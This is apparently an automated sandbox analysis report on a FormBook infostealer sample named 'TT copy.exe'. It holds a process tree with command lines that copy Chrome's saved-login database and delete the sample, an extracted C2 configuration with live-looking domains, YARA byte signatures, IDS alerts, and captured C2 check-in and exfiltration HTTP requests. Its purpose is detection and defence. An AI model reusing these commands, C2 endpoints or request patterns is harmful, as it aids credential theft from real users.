Windows Analysis Report
TT copy.exe

Overview

General Information

Sample Name:TT copy.exe
Analysis ID:638587
MD5:6443c909d7e8034f945f3e1dc138a046
SHA1:a8a4d0653f3598cd477e5887cf12b3ed33625898
SHA256:de1caed83e7085b2ee79d77ea41b9cfa079182680e7db2c1a8d3cedbc2ac2676
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • TT copy.exe (PID: 1800 cmdline: "C:\Users\user\Desktop\TT copy.exe" MD5: 6443C909D7E8034F945F3E1DC138A046)
    • TT copy.exe (PID: 1388 cmdline: C:\Users\user\Desktop\TT copy.exe MD5: 6443C909D7E8034F945F3E1DC138A046)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 3800 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 1448 cmdline: /c del "C:\Users\user\Desktop\TT copy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5224 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.drivetrianrepair.com/umat/"], "decoy": ["hochanationlive.com", "oreillypresent.com", "ineedmoretape.com", "hulftegg.com", "erpel.xyz", "bocaimvip.com", "1803bragg.com", "novamercado.online", "medonlinestore.com", "lizishuju.com", "408wmountain.info", "pixelperfect.biz", "vacuumsforvets.com", "aurelioperezsellsgilroy.com", "vinhmedialife.com", "bani-pe-pilot-automat.com", "sarrafguler.com", "joaorenato.com", "blazeoficial.online", "huiyi-sui.com", "terminer.xyz", "wealthuon.com", "vitamixn.com", "sinsegae.net", "elsiehull.com", "shihetian.com", "petrascoaching.online", "dramaelaboration.top", "notariatresmatehuala.com", "theflysnare.com", "jxzoe.com", "toscot.land", "pheife.com", "homilas.com", "dunkefy.com", "weichie.biz", "asalahgroup.com", "ggoomal.com", "mattav.com", "phinisicoffee.com", "missioncriticalbiz.com", "ctleurope.net", "franciscojunior.net", "huayugw.com", "righthandclaims.com", "ketooxocefat.xyz", "shopcycles3.com", "moiecaten.com", "sassafrasriver.info", "titanastrology.com", "sofasshoppri.com", "smzy.club", "vapodistri.xyz", "totallogamsolusi.com", "airvataus.com", "renyposh.com", "vinicimes.pro", "internet-sichrheit.com", "hucaxiwid.site", "alexandrathunecke.com", "wanyituan001.com", "performanceleads.online", "thegreatpartyvenue.com", "teknodijitalmatbaa.xyz"]}
Source | Rule | Description | Author | Strings
00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
    00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8c18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8fb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15e01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1507c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa742:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b997:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        Source | Rule | Description | Author | Strings
        3.0.TT copy.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.0.TT copy.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7e18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x81b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15555:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15001:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15657:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x157cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8bca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1427c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9942:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.0.TT copy.exe.400000.6.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
          3.0.TT copy.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
            3.0.TT copy.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
            No Sigma rule has matched
            Timestamp: 06/03/22-08:17:26.941837 | SID: 2031453 | Source IP: 192.168.2.4 | Source Port: 49786 | Destination IP: 18.193.36.153 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:19:23.968199 | SID: 2031412 | Source IP: 192.168.2.4 | Source Port: 49893 | Destination IP: 154.36.145.110 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:16:58.893159 | SID: 2031453 | Source IP: 192.168.2.4 | Source Port: 49780 | Destination IP: 185.254.241.173 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:16:58.893159 | SID: 2031412 | Source IP: 192.168.2.4 | Source Port: 49780 | Destination IP: 185.254.241.173 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:17:26.941837 | SID: 2031412 | Source IP: 192.168.2.4 | Source Port: 49786 | Destination IP: 18.193.36.153 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:19:23.968199 | SID: 2031453 | Source IP: 192.168.2.4 | Source Port: 49893 | Destination IP: 154.36.145.110 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:19:29.232565 | SID: 2031453 | Source IP: 192.168.2.4 | Source Port: 49896 | Destination IP: 34.102.136.180 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:19:29.232565 | SID: 2031412 | Source IP: 192.168.2.4 | Source Port: 49896 | Destination IP: 34.102.136.180 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:16:58.893159 | SID: 2031449 | Source IP: 192.168.2.4 | Source Port: 49780 | Destination IP: 185.254.241.173 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:17:26.941837 | SID: 2031449 | Source IP: 192.168.2.4 | Source Port: 49786 | Destination IP: 18.193.36.153 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:19:29.232565 | SID: 2031449 | Source IP: 192.168.2.4 | Source Port: 49896 | Destination IP: 34.102.136.180 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
            Timestamp: 06/03/22-08:19:23.968199 | SID: 2031449 | Source IP: 192.168.2.4 | Source Port: 49893 | Destination IP: 154.36.145.110 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected

            AV Detection

            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook
            Source: TT copy.exe | Virustotal: Detection: 34%
            Source: Yara match | File source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: TT copy.exe | Avira: detected
            Source: http://www.drivetrianrepair.com/umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=Mzrp | Avira URL Cloud: Label: malware
            Source: http://www.sinsegae.net/umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=Mzrp | Avira URL Cloud: Label: malware
            Source: http://www.drivetrianrepair.com/umat/ | Avira URL Cloud: Label: malware
            Source: http://www.shopcycles3.com/umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=Mzrp | Avira URL Cloud: Label: malware
            Source: http://www.huiyi-sui.com/umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=Mzrp | Avira URL Cloud: Label: malware
            Source: http://www.huiyi-sui.com/umat/ | Avira URL Cloud: Label: malware
            Source: www.drivetrianrepair.com/umat/ | Avira URL Cloud: Label: malware
            Source: TT copy.exe | Joe Sandbox ML: detected
            Source: 3.0.TT copy.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.TT copy.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.TT copy.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.2.TT copy.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
            Source: TT copy.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: TT copy.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: StreamingContextSta.pdb source: TT copy.exe
            Source: Binary string: wntdll.pdbUGP source: TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.277558771.0000000000D05000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.283452054.0000000000EA1000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.359728114.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.352750637.0000000004E4D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: TT copy.exe, TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.277558771.0000000000D05000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.283452054.0000000000EA1000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.359728114.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.352750637.0000000004E4D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: TT copy.exe, 00000003.00000002.358458771.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: TT copy.exe, 00000003.00000002.358458771.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 15_2_00F41670 FindFirstFileW,FindNextFileW,FindClose,15_2_00F41670
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 15_2_00F4166B FindFirstFileW,FindNextFileW,FindClose,15_2_00F4166B

            Networking

            Source: C:\Windows\explorer.exe | Network Connect: 107.187.232.173 80
            Source: C:\Windows\explorer.exe | Domain query: www.huiyi-sui.com
            Source: C:\Windows\explorer.exe | Domain query: www.sarrafguler.com
            Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
            Source: C:\Windows\explorer.exe | Network Connect: 18.193.36.153 80
            Source: C:\Windows\explorer.exe | Network Connect: 66.96.162.130 80
            Source: C:\Windows\explorer.exe | Network Connect: 198.44.241.20 80
            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 172.16.0.13 80
            Source: C:\Windows\explorer.exe | Network Connect: 154.36.145.110 80
            Source: C:\Windows\explorer.exe | Domain query: www.pheife.com
            Source: C:\Windows\explorer.exe | Domain query: www.sassafrasriver.info
            Source: C:\Windows\explorer.exe | Network Connect: 185.254.241.173 80
            Source: C:\Windows\explorer.exe | Domain query: www.drivetrianrepair.com
            Source: C:\Windows\explorer.exe | Domain query: www.theflysnare.com
            Source: C:\Windows\explorer.exe | Network Connect: 162.213.255.237 80
            Source: C:\Windows\explorer.exe | Domain query: www.408wmountain.info
            Source: C:\Windows\explorer.exe | Domain query: www.shopcycles3.com
            Source: C:\Windows\explorer.exe | Domain query: www.sinsegae.net
            Source: C:\Windows\explorer.exe | Domain query: www.huayugw.com
            Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 185.254.241.173:80
            Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 185.254.241.173:80
            Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 185.254.241.173:80
            Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49786 -> 18.193.36.153:80
            Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49786 -> 18.193.36.153:80
            Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49786 -> 18.193.36.153:80
            Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49893 -> 154.36.145.110:80
            Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49893 -> 154.36.145.110:80
            Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49893 -> 154.36.145.110:80
            Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 34.102.136.180:80
            Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 34.102.136.180:80
            Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 34.102.136.180:80
            Source: Malware configuration extractor | URLs: www.drivetrianrepair.com/umat/
            Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS EGIHOSTINGUS
            Source: Joe Sandbox View | ASN Name: COGENT-174US COGENT-174US
            Source: global traffic | HTTP traffic detected: GET /umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=Mzrp HTTP/1.1 Host: www.sinsegae.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic | HTTP traffic detected: GET /umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=Mzrp HTTP/1.1 Host: www.shopcycles3.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic | HTTP traffic detected: GET /umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=Mzrp HTTP/1.1 Host: www.drivetrianrepair.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic | HTTP traffic detected: GET /umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrp HTTP/1.1 Host: www.408wmountain.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic | HTTP traffic detected: GET /umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=Mzrp HTTP/1.1 Host: www.huiyi-sui.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic | HTTP traffic detected: GET /umat/?bT7tPLpx=FnqEmG0l+4J7qDB1yrHJ8vmLGr/EIrLpN16t5uGcZtfyOUhwcz0qzKS8JKDk7Sjhqw7U&Lls=Mzrp HTTP/1.1 Host: www.sarrafguler.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic | HTTP traffic detected: GET /umat/?bT7tPLpx=KCFtk2ByPIrj6EQbanamrSzf2WMHsV3o1++x6ahF6LksDSy9FlqjvwWpWYTFvIM6F0DF&Lls=Mzrp HTTP/1.1 Host: www.theflysnare.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic | HTTP traffic detected: GET /umat/?bT7tPLpx=2PPXS0ByghwnUiXofzfHcTluxn0kF7CQXUmv2gLgzHNDwPHvxa5MhM39jfYs7JtQ10qs&Lls=Mzrp HTTP/1.1 Host: www.huayugw.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox View | IP Address: 23.227.38.74 23.227.38.74
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.drivetrianrepair.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.drivetrianrepair.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drivetrianrepair.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 70 67 66 38 43 4b 6a 36 75 4e 4c 43 78 45 49 77 6d 33 37 62 45 4e 56 58 59 35 7a 69 79 4b 58 4f 55 37 31 45 31 36 76 6a 6e 6e 59 49 6f 78 67 44 28 69 6a 30 52 31 57 38 56 7a 4c 74 33 4d 52 46 74 44 49 2d 54 76 43 79 4c 5a 32 64 4e 42 4b 79 69 4e 28 31 38 5f 53 31 46 31 50 58 53 69 7e 41 72 58 6e 4f 52 48 42 34 54 2d 6d 71 44 6f 33 69 34 46 4d 4b 53 44 39 34 6c 50 54 71 70 54 4d 7a 4b 79 70 41 30 31 70 73 39 74 56 43 42 2d 43 74 43 56 74 6c 78 79 48 4b 63 79 6b 63 31 59 37 63 57 36 46 35 35 33 36 75 42 37 45 61 33 6b 6c 77 77 53 66 38 47 46 75 75 4f 66 43 77 78 41 45 61 73 77 62 50 6f 53 49 69 39 53 55 56 4a 42 74 36 7e 31 36 37 30 31 4c 53 71 4d 53 4e 4d 57 6d 47 6e 6b 76 5a 34 44 65 59 38 66 31 63 4f 38 61 44 62 43 4e 37 5a 53 4e 53 78 61 41 66 49 66 49 78 36 43 56 77 30 74 72 76 66 4b 6e 36 73 68 59 35 45 6f 69 74 75 70 41 62 4a 78 35 67 70 64 45 45 73 44 73 45 79 4e 55 47 42 35 4b 6d 4b 67 48 4d 6b 6d 7e 6f 70 72 71 59 39 4a 57 36 69 76 6c 45 35 53 50 46 68 76 47 54 31 49 46 53 56 48 51 68 66 63 35 72 52 4c 64 59 55 72 79 52 63 7a 57 59 41 32 6e 59 4b 37 55 43 4b 4d 37 44 45 62 55 78 57 36 54 71 50 5f 28 37 41 41 73 46 46 6d 7e 53 75 55 39 5f 64 6d 62 4c 72 62 62 6e 48 67 4d 4e 32 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
bT7tPLpx=pgf8CKj6uNLCxEIwm37bENVXY5ziyKXOU71E16vjnnYIoxgD(ij0R1W8VzLt3MRFtDI-TvCyLZ2dNBKyiN(18_S1F1PXSi~ArXnORHB4T-mqDo3i4FMKSD94lPTqpTMzKypA01ps9tVCB-CtCVtlxyHKcykc1Y7cW6F5536uB7Ea3klwwSf8GFuuOfCwxAEaswbPoSIi9SUVJBt6~16701LSqMSNMWmGnkvZ4DeY8f1cO8aDbCN7ZSNSxaAfIfIx6CVw0trvfKn6shY5EoitupAbJx5gpdEEsDsEyNUGB5KmKgHMkm~oprqY9JW6ivlE5SPFhvGT1IFSVHQhfc5rRLdYUryRczWYA2nYK7UCKM7DEbUxW6TqP_(7AAsFFm~SuU9_dmbLrbbnHgMN2Q).
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.drivetrianrepair.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.drivetrianrepair.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drivetrianrepair.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 70 67 66 38 43 4b 65 76 71 39 33 62 37 30 4d 54 67 46 37 48 4c 73 6c 52 61 4a 28 35 7e 76 76 34 66 70 63 31 6f 49 6e 30 6d 6d 67 43 69 52 39 68 37 6c 32 6e 52 77 72 53 53 42 76 70 7a 73 56 47 74 44 52 64 54 76 47 79 49 5a 65 4e 4e 6e 57 59 6a 76 6e 36 34 66 54 51 55 46 4f 42 57 6a 69 35 72 58 7a 34 52 45 68 53 54 4f 61 71 44 4c 66 69 7e 48 6b 37 49 54 38 53 35 66 44 32 6e 7a 49 45 4b 79 42 59 30 77 52 73 7e 64 52 43 44 65 79 73 45 55 73 7a 75 43 47 68 4d 43 6c 43 38 34 6e 32 57 36 42 58 35 7a 36 75 43 4f 30 61 6d 6e 74 77 34 42 6e 39 4e 56 75 76 4b 66 43 70 6e 41 34 78 73 32 28 35 6f 54 38 63 38 67 49 56 4c 78 74 75 36 6d 61 4a 6c 57 6a 37 73 4d 6e 76 4d 57 71 76 6e 31 43 47 34 43 79 67 37 74 63 69 42 2d 43 35 62 45 56 46 59 79 4e 65 6a 36 41 2d 49 66 49 37 36 43 56 65 30 74 37 76 66 4c 28 36 39 77 49 35 52 34 69 75 31 70 42 65 54 42 34 6d 74 63 34 75 73 48 41 2d 79 4a 51 77 41 4b 79 6d 4b 78 58 4d 78 56 57 33 68 72 71 65 71 5a 57 39 7a 5f 6c 62 35 53 50 37 68 75 47 44 31 5f 46 53 58 53 38 68 65 35 4e 72 63 62 64 59 66 4c 79 54 56 54 53 49 41 33 50 63 4b 36 6b 53 4b 5f 58 44 45 4a 63 78 57 65 6e 71 4a 50 28 37 5a 77 74 46 4e 6c 76 37 34 48 68 7a 63 6c 54 43 6b 4e 75 7a 48 53 74 41 74 44 39 61 37 75 77 4e 6c 5a 67 75 65 70 54 5a 67 54 31 5a 75 68 43 5f 62 54 54 35 57 33 54 32 44 5f 78 4a 4b 59 46 63 30 32 43 33 5a 46 6c 68 7a 35 30 55 79 2d 65 62 4f 79 4f 55 6f 30 46 74 79 6b 55 52 4f 66 6a 66 4c 73 38 73 70 2d 4f 4d 33 46 6c 35 6e 74 35 53 37 47 41 7a 45 2d 64 41 54 4e 77 4c 50 4c 56 4c 
